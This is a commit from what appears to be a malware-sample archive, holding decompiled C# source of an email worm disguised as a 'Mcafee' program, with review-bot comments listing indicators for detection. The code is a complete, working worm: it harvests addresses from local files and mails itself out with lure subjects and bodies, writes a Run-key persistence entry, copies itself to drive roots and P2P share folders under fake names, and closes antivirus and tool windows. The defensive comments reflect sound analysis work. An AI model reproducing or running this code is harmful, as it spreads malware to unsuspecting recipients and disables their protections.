auto-decompiled msil via petikvx

add
vxunderground
2022-08-18 06:28:56 -05:00
parent 26192f771b
commit f2ac1ece55
12767 changed files with 1945075 additions and 0 deletions
@@ -0,0 +1,44 @@
// Decompiled with JetBrains decompiler
// Type: Api.api
// Assembly: Mcafee, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: E8ABDF02-8A4A-421D-8941-056F8CA96A8B
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Cabac.a-6a616d6396ea98af23899d1ef241f1987c0c048c5ff5c3600a97133b5e844b01.exe
using System.Runtime.InteropServices;
namespace Api
{
public class api
{
public const int SW_HIDE = 0;
public const int ConsoleWindowClass = 1;
public const string amir = "hi i'm devil worm";
public const int EWX_LOGOFF = 0;
public const int EWX_SHUTDOWN = 1;
public const int EWX_REBOOT = 2;
public const int EWX_FORCE = 4;
public const int EWX_POWEROFF = 8;
[DllImport("winmm.dll", EntryPoint = "mciSendStringA")]
public static extern int mciSendString(
string lpstrCommand,
string lpstrReturnString,
int uReturnLength,
int hwndCallback);
[DllImport("user32")]
public static extern int ShowWindow(int hwnd, int nCmdShow);
[DllImport("user32")]
public static extern int MessageBeep(int wType);
[DllImport("kernel32")]
public static extern int Sleep(int dwMilliseconds);
[DllImport("user32", EntryPoint = "FindWindowA")]
public static extern int FindWindow(string lpClassName, string lpWindowName);
[DllImport("shell32", EntryPoint = "#59")]
public static extern int SHRestartSystemMB(int hOwner, string sExtraPrompt, int uFlags);
}
}
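Review bot: The P/Invoke block in `Api.api` has no comment saying which imports are actually used, which slows triage of this decompiled sample. In the sections visible on this page only `MessageBeep` and `SHRestartSystemMB` are called (from `Form1.eerrorr_Tick`); `mciSendString`, `ShowWindow`, `Sleep` and `FindWindow` appear unreferenced, though callers may exist outside this view. `SHRestartSystemMB` is bound by ordinal (`EntryPoint = "#59"`), so a detection rule keyed on a shell32 export name may miss it and should match the ordinal string instead. I would add above the class: `// Analyst note: only MessageBeep and SHRestartSystemMB (shell32 ordinal #59) are called from the visible Form1 code; other imports look unused.`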
@@ -0,0 +1,14 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: ComVisible(false)]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: Guid("60fd839e-9d72-4f28-91ea-e8e543d11475")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCopyright("Copyright © civil 2006")]
[assembly: AssemblyProduct("Mcafee")]
[assembly: AssemblyCompany("civil")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyTitle("Mcafee")]
[assembly: AssemblyVersion("1.0.0.0")]
@@ -0,0 +1,53 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Cabac.a-6a616d6396ea98af23899d1ef241f1987c0c048c5ff5c3600a97133b5e844b01.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{EB2FD7D7-22DC-4B20-B880-B625461DB9DA}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>Mcafee</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<RootNamespace>Mcafee</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Drawing" />
<Reference Include="System.Web" />
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="Program.cs" />
<Compile Include="Form2.cs" />
<Compile Include="Form1.cs" />
<Compile Include="Properties\Settings.cs" />
<Compile Include="Properties\Resources.cs" />
<Compile Include="Api\api.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="Form1.resx" />
<EmbeddedResource Include="Form2.resx" />
<EmbeddedResource Include="Properties\Resources.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "Mcafee", "Email-Worm.MSIL.Cabac.a-6a616d6396ea98af23899d1ef241f1987c0c048c5ff5c3600a97133b5e844b01.csproj", "{EB2FD7D7-22DC-4B20-B880-B625461DB9DA}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{EB2FD7D7-22DC-4B20-B880-B625461DB9DA}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{EB2FD7D7-22DC-4B20-B880-B625461DB9DA}.Debug|Any CPU.Build.0 = Debug|Any CPU
{EB2FD7D7-22DC-4B20-B880-B625461DB9DA}.Release|Any CPU.ActiveCfg = Release|Any CPU
{EB2FD7D7-22DC-4B20-B880-B625461DB9DA}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,218 @@
// Decompiled with JetBrains decompiler
// Type: Mcafee.Form1
// Assembly: Mcafee, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: E8ABDF02-8A4A-421D-8941-056F8CA96A8B
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Cabac.a-6a616d6396ea98af23899d1ef241f1987c0c048c5ff5c3600a97133b5e844b01.exe
using Api;
using Microsoft.Win32;
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.IO;
using System.Windows.Forms;
namespace Mcafee
{
public class Form1 : Form
{
private IContainer components;
private Timer mailer;
private Timer killer;
private Timer coppy;
private Timer eerrorr;
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.components = (IContainer) new Container();
this.mailer = new Timer(this.components);
this.killer = new Timer(this.components);
this.coppy = new Timer(this.components);
this.eerrorr = new Timer(this.components);
this.SuspendLayout();
this.mailer.Enabled = true;
this.mailer.Interval = 50000;
this.mailer.Tick += new EventHandler(this.mailer_Tick);
this.killer.Enabled = true;
this.killer.Interval = 150;
this.killer.Tick += new EventHandler(this.killer_Tick);
this.coppy.Enabled = true;
this.coppy.Interval = 720000;
this.coppy.Tick += new EventHandler(this.coppy_Tick);
this.eerrorr.Enabled = true;
this.eerrorr.Interval = 90000;
this.eerrorr.Tick += new EventHandler(this.eerrorr_Tick);
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.ClientSize = new Size(292, 266);
this.Name = nameof (Form1);
this.Text = "AmirCivil";
this.Activated += new EventHandler(this.amir22);
this.Load += new EventHandler(this.Form1_Load);
this.ResumeLayout(false);
}
public Form1() => this.InitializeComponent();
private void Form1_Load(object sender, EventArgs e)
{
}
private void mailer_Tick(object sender, EventArgs e) => new Form2().Show();
private void killer_Tick(object sender, EventArgs e)
{
try
{
string[] strArray = new string[57]
{
"NPROTECTED",
"GhostTray",
"NAVW32",
"F-AGNT95",
"NOD32",
"NETD32",
"NETMON",
"IOMON98",
"SCAN32",
"NORMIST",
"NAVW3",
"ADAWARE",
"AGENTW",
"LU32",
"NAVAP32",
"ANTIVIR",
"TCM",
"W9X",
"AVKSERV",
"AV32",
"ACKWIN32",
"AD-AWARE",
"ADVXDWIN",
"AGENTSVR",
"AGENTW",
"ANTIVIRUS",
"ANTS",
"APIMONITOR",
"APLICA32",
"ARR",
"AUPDATE",
"AUTODOWN",
"AUTOTRACE",
"AVE32",
"AVGCC32",
"AVGCTRL",
"AVGNT",
"CFINET",
"CLEANPC",
"CTRL",
"AV32",
"DATEMANAGER ",
"DOORS",
"DPFSETUP ",
"FCH32 ",
"FNRB32",
"notepad",
"Babylon",
"POP3TRAP",
"WINWORD",
"realplay",
"EXCEL",
"taskmgr",
"regedit",
"vb6",
"ZONEALARM",
"POWERPNT"
};
foreach (Process process in Process.GetProcessesByName(strArray[new Random().Next(0, 57)]))
process.CloseMainWindow();
}
catch (Exception ex)
{
}
}
private void coppy_Tick(object sender, EventArgs e)
{
try
{
string str = new string[10]
{
"\\Services.pif",
"\\winamp.exe",
"\\mail.dll.exe",
"\\vista.exe",
"\\Norton.exe",
"\\Mcafee.exe",
"\\Nod32.cmd",
"\\avg.pif",
"\\AmirCivil.pif",
"\\ScreenSaver.scr"
}[new Random().Next(0, 10)];
foreach (string logicalDrive in Directory.GetLogicalDrives())
File.Copy(Application.ExecutablePath, logicalDrive + str);
}
catch (Exception ex)
{
}
}
private void amir22(object sender, EventArgs e)
{
this.Hide();
try
{
File.Copy(Application.ExecutablePath, Environment.SystemDirectory + "\\WinServicces.cab.bak.exe");
Registry.SetValue("HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "SadNet3", (object) (Environment.SystemDirectory + "\\WinServicces.cab.bak.exe"), RegistryValueKind.ExpandString);
Registry.SetValue("HKEY_CURRENT_USER\\SadNet3", "SadNet3", (object) "(_-oO]xX|-|S|-|a|-|d|-|N|-|e|-|t|-|Xx[Oo-_)!", RegistryValueKind.ExpandString);
}
catch (Exception ex)
{
}
try
{
File.Copy(Application.ExecutablePath, "C:\\Program Files\\\\Kazaa\\My Shared Folder\\winampa.dll.pif");
File.Copy(Application.ExecutablePath, "D:\\Program Files\\\\Kazaa\\My Shared Folder\\project.exe");
File.Copy(Application.ExecutablePath, "J:\\Program Files\\\\Kazaa\\My Shared Folder\\SkyNetAntiVirus.doc.cmd");
File.Copy(Application.ExecutablePath, "E:\\Program Files\\\\Kazaa\\My Shared Folder\\screen_saver!.scr");
File.Copy(Application.ExecutablePath, "F:\\Program Files\\\\Kazaa\\My Shared Folder\\winlogon.dll.exe");
File.Copy(Application.ExecutablePath, "H:\\Program Files\\\\Kazaa\\My Shared Folder\\fun.pic.scr");
File.Copy(Application.ExecutablePath, "C:\\Program Files\\Kazaa\\My Shared Folder\\winampa.dll.pif");
File.Copy(Application.ExecutablePath, "C:\\Program Files\\StreamCast\\Morpheus\\My Shared Folder\\winampa.dll.pif");
File.Copy(Application.ExecutablePath, "C:\\Program Files\\Gnucleus\\Downloads\\AnyDVD.v6.0.0.4.Cracked-RES.by.Warez.exe");
File.Copy(Application.ExecutablePath, "C:\\Program Files\\eMule\\Incoming\\symantec.cmd");
File.Copy(Application.ExecutablePath, "D:\\Program Files\\Kazaa\\My Shared Folder\\winampa.dll.pif");
File.Copy(Application.ExecutablePath, "D:\\Program Files\\StreamCast\\Morpheus\\My Shared Folder\\winampa.dll.pif");
File.Copy(Application.ExecutablePath, "D:\\Program Files\\Gnucleus\\Downloads\\AnyDVD.v6.0.0.4.Cracked-RES.by.Warez.exe");
File.Copy(Application.ExecutablePath, "D:\\Program Files\\eMule\\Incoming\\symantec.cmd");
File.Copy(Application.ExecutablePath, "E:\\Program Files\\Kazaa\\My Shared Folder\\winampa2.dll.pif");
File.Copy(Application.ExecutablePath, "E:\\Program Files\\StreamCast\\Morpheus\\My Shared Folder\\winampa.dll.pif");
File.Copy(Application.ExecutablePath, "E:\\Program Files\\Gnucleus\\Downloads\\AnyDVD.v6.0.0.4.Cracked-RES.by.Warez.exe");
File.Copy(Application.ExecutablePath, "E:\\Program Files\\eMule\\Incoming\\symantec.cmd");
File.Copy(Application.ExecutablePath, "C:\\Program Files\\Kazaa\\My Shared Folder\\winampa.dll.pif");
File.Copy(Application.ExecutablePath, "D:\\Program Files\\Kazaa\\My Shared Folder\\project.exe");
File.Copy(Application.ExecutablePath, "J:\\Program Files\\Kazaa\\My Shared Folder\\SkyNetAntiVirus.doc.cmd");
File.Copy(Application.ExecutablePath, "E:\\Program Files\\Kazaa\\My Shared Folder\\screen_saver!.scr");
File.Copy(Application.ExecutablePath, "F:\\Program Files\\Kazaa\\My Shared Folder\\winlogon.dll.exe");
File.Copy(Application.ExecutablePath, "H:\\Program Files\\Kazaa\\My Shared Folder\\fun.pic.scr");
}
catch (Exception ex)
{
}
}
private void eerrorr_Tick(object sender, EventArgs e)
{
api.MessageBeep(20);
api.SHRestartSystemMB(0, "Windows", 1);
}
}
}
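Review bot: `Form1.cs` is committed without an analyst header, so the host artefacts a responder needs are buried in `amir22`. The visible lines show a self-copy to `Environment.SystemDirectory + "\\WinServicces.cab.bak.exe"`, a Run value named `SadNet3` under `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run` written with `RegistryValueKind.ExpandString`, and a marker key `HKEY_CURRENT_USER\SadNet3`. I would add a header comment listing those three artefacts, together with the drive-root file names from `coppy_Tick` and the P2P share paths from `amir22`, as references for detection and clean-up. The same comment should record that `killer_Tick` fires every 150 ms and calls `CloseMainWindow()` on one randomly chosen process name per tick, so repeated unexpected window closes of security tools, `taskmgr` or `regedit` are a behavioural sign of this sample.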
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
@@ -0,0 +1,198 @@
// Decompiled with JetBrains decompiler
// Type: Mcafee.Form2
// Assembly: Mcafee, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: E8ABDF02-8A4A-421D-8941-056F8CA96A8B
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Cabac.a-6a616d6396ea98af23899d1ef241f1987c0c048c5ff5c3600a97133b5e844b01.exe
using System;
using System.ComponentModel;
using System.Drawing;
using System.IO;
using System.Text;
using System.Text.RegularExpressions;
using System.Web.Mail;
using System.Windows.Forms;
namespace Mcafee
{
public class Form2 : Form
{
private IContainer components;
public Form2() => this.InitializeComponent();
private void Form2_Load(object sender, EventArgs e)
{
}
private void amir(object sender, EventArgs e)
{
this.Hide();
try
{
for (int index = 0; index < 6; ++index)
{
string str1 = new string[20]
{
"mcafee",
"symantec",
"Yahoo!",
"Norton! ",
"Text message",
"NOD32",
"Important bill! ",
"Message Notify ",
"Fax Message",
"Protected message",
"Cum a murit Papa?",
"Encrypted document",
"Account notify",
"E-mail account disabling warning",
"E-mail technical support message.",
"E-mail warning",
"Email account utilization warning.",
"Fax Message Received ",
"Pentru Ionel",
"IranSare2008"
}[new Random().Next(0, 20)];
string str2 = new string[5]
{
"AmirCivil.pic.cmd",
"register.pif ",
"sexy-screensaver.scr ",
"fullmessenger.exe",
"readme.html.cmd"
}[new Random().Next(0, 5)];
string str3 = new string[20]
{
"nice stuffs i got here... ",
"Message Error",
"i've got cool stuffs here... ",
"i want you to know how much i care for you... ",
"hello! i'm your long, lost friend... ",
"kindness is a virtue... ",
"sharing files is the essence of living... check this out... ",
"hi, friend... here are some nice stuffs that i got from the internet... check it out... ",
"hmmmn... i guess you've forgotten me... but anyways, i wanna make up... here are the files that made me like the internet more... see for yourself...",
"one of the files is a virus... can you tell me which one is it? hehehe, i'm only joking... your friend, paul.. ",
"classroom test of you? ",
"old photos about you? ",
"i hope thats not true! ",
"three files for you to keep... always remember that i'm into deep... i don't know you but i think i'm in love... ",
" you know amir_civil?!",
"Ioana, sex in grup in camin. Cred ca o stii si ",
"another pic, have fun! ... :->",
"Credeti ca ar fi mai bine ca Romania sa-si retraga trupele din Irak anul acesta?Deschideti programul Vot, alegeti votul dvs. si vedeti rezultatele.Parerea dvs. conteaza!",
"the information is wrong! ",
"Credeti ca ar fi mai bine ca Romania sa-si retraga trupele din Irak anul acesta?Deschideti programul Vot, alegeti votul dvs. si vedeti rezultatele.Parerea dvs. conteaza! "
}[new Random().Next(0, 20)];
string searchPattern = new string[3]
{
"*txt",
"*html",
"*xml"
}[new Random().Next(0, 3)];
string str4 = new string[20]
{
"mcafee@yahoo.com",
"symantec@yahoo.com",
"nod32@yahoo.com",
"panda@yahoo.com",
"avg@yahoo.com",
"password@yahoo.com",
"info@yahoo.com",
"ebook@yahoo.com",
"LongShot@yahoo.com",
"pic@yahoo.com",
"update@yahoo.com",
"matt@yahoo.com",
"steve@yahoo.com",
"smith@yahoo.com",
"stan@yahoo.com",
"bill@yahoo.com",
"bob@yahoo.com",
"YourFriend@yahoo.com",
" mail@yahoo.com",
"ted@yahoo.com"
}[new Random().Next(0, 20)];
string path = new string[5]
{
"C:\\",
"D:\\",
"E:\\",
"G:\\",
"F:\\"
}[new Random().Next(0, 5)];
try
{
string[] strArray = new string[1]
{
"C:\\windows"
};
foreach (string str5 in strArray)
{
foreach (string file in Directory.GetFiles(path, searchPattern))
{
Regex regex = new Regex("[a-zA-Z0-9-_.-]+@[a-zA-Z0-9-_.-]+\\.[a-zA-Z0-9]+");
FileStream fileStream = new FileStream(file, FileMode.Open, FileAccess.Read);
byte[] numArray = new byte[fileStream.Length];
fileStream.Read(numArray, 0, (int) fileStream.Length);
fileStream.Close();
foreach (Match match in regex.Matches(Encoding.ASCII.GetString(numArray)))
{
string str6 = match.ToString();
try
{
MailMessage message = new MailMessage();
message.From = str4;
message.To = str6;
message.Cc = "info@yahoo.com";
message.Bcc = "password@yahoo.com";
message.Subject = str1;
message.Body = str3;
SmtpMail.SmtpServer = "mx4.mail.yahoo.com";
message.Attachments.Add((object) new MailAttachment(Application.ExecutablePath, MailEncoding.Base64));
SmtpMail.Send(message);
}
catch (Exception ex)
{
}
}
}
}
}
catch (Exception ex)
{
}
}
}
catch (Exception ex)
{
}
}
private void timer1_Tick(object sender, EventArgs e)
{
}
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.SuspendLayout();
this.AutoScaleDimensions = new SizeF(6f, 13f);
this.AutoScaleMode = AutoScaleMode.Font;
this.ClientSize = new Size(292, 266);
this.Name = nameof (Form2);
this.Text = nameof (Form2);
this.Activated += new EventHandler(this.amir);
this.Load += new EventHandler(this.Form2_Load);
this.ResumeLayout(false);
}
}
}
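Review bot: The mail routine in `Form2.amir` has no comment recording its network indicators, which are the most useful part of this file for mail-gateway and egress detection. The visible code sets `SmtpMail.SmtpServer = "mx4.mail.yahoo.com"`, always uses Cc `info@yahoo.com` and Bcc `password@yahoo.com`, draws the sender from a fixed list of `@yahoo.com` addresses, and attaches `Application.ExecutablePath` with `MailEncoding.Base64`. I would add a comment block above `amir` listing those constants, plus the subject and body string tables, as indicators. The comment should also state that `str2` (the list of attachment names) is selected but never read in the visible code, so the attachment presumably carries the executable's on-disk name and detections should not be keyed on the `str2` values.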
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
@@ -0,0 +1,22 @@
// Decompiled with JetBrains decompiler
// Type: Mcafee.Program
// Assembly: Mcafee, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: E8ABDF02-8A4A-421D-8941-056F8CA96A8B
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Cabac.a-6a616d6396ea98af23899d1ef241f1987c0c048c5ff5c3600a97133b5e844b01.exe
using System;
using System.Windows.Forms;
namespace Mcafee
{
internal static class Program
{
[STAThread]
private static void Main()
{
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
Application.Run((Form) new Form1());
}
}
}
@@ -0,0 +1,46 @@
// Decompiled with JetBrains decompiler
// Type: Mcafee.Properties.Resources
// Assembly: Mcafee, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: E8ABDF02-8A4A-421D-8941-056F8CA96A8B
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.MSIL.Cabac.a-6a616d6396ea98af23899d1ef241f1987c0c048c5ff5c3600a97133b5e844b01.exe
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace Mcafee.Properties
{
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "2.0.0.0")]
[CompilerGenerated]
[DebuggerNonUserCode]
internal class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
internal Resources()
{
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (Mcafee.Properties.Resources.resourceMan == null)
Mcafee.Properties.Resources.resourceMan = new ResourceManager("Mcafee.Properties.Resources", typeof (Mcafee.Properties.Resources).Assembly);
return Mcafee.Properties.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => Mcafee.Properties.Resources.resourceCulture;
set => Mcafee.Properties.Resources.resourceCulture = value;
}
}
}
